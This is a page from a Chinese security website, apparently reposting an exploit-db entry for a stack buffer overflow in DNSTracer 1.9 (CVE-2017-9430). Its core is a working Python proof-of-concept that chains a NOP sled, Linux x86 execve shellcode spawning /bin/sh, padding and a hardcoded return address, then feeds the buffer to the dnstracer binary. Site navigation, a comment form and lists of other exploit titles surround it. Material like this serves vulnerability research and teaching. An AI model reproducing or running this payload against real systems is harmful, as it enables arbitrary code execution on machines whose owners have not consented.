首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DNSTracer 1.9 - Buffer Overflow
来源:http://jolama.es 作者:j0lama 发布时间:2017-08-04  
# Exploit Title: DNSTracer 1.9 - Buffer Overflow
# Google Dork: [if applicable]
# Date: 03-08-2017
# Exploit Author: j0lama
# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php
# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz
# Version: 1.9
# Tested on: Ubuntu 12.04
# CVE : CVE-2017-9430
# Bug report: https://www.exploit-db.com/exploits/42115/
# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php
 
 
# Proof of Concept
import os
from subprocess import call
 
def run():
    try:
        print "\nDNSTracer Stack-based Buffer Overflow"
        print "Author: j0lama"
        print "Tested with Dnstracer compile without buffer overflow protection"
 
        nops = "\x90"*1006
        shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
        filling = "A"*24
        eip = "\x2f\xeb\xff\xbf"
 
        #buf size = 1057
        buf = nops + shellcode + filling + eip
 
        call(["./dnstracer", buf])
 
    except OSError as e:
        if e.errno == os.errno.ENOENT:
            print "\nDnstracer not found!\n"
        else:
            print "\nError executing exploit\n"
        raise
 
 
if __name__ == '__main__':
    try:
        run()
    except Exception as e:
        print "Something went wrong"
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·SMBLoris Denial Of Service
·Microsoft Windows - LNK Shortc
·Hashicorp vagrant-vmware-fusio
·Solarwinds Kiwi Syslog 9.6.1.6
·Nitro Pro PDF Reader 11.0.3.17
·Microsoft Windows LNK Shortcut
·Advantech SUSIAccess <= 3.0 -
·Advantech SUSIAccess <= 3.0 -
·DiskBoss Enterprise 8.2.14 - B
·Jenkins < 1.650 - Java Deseria
·Bittorrent 7.10.0 (Build 43581
·GitHub Enterprise < 2.8.7 - Re
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved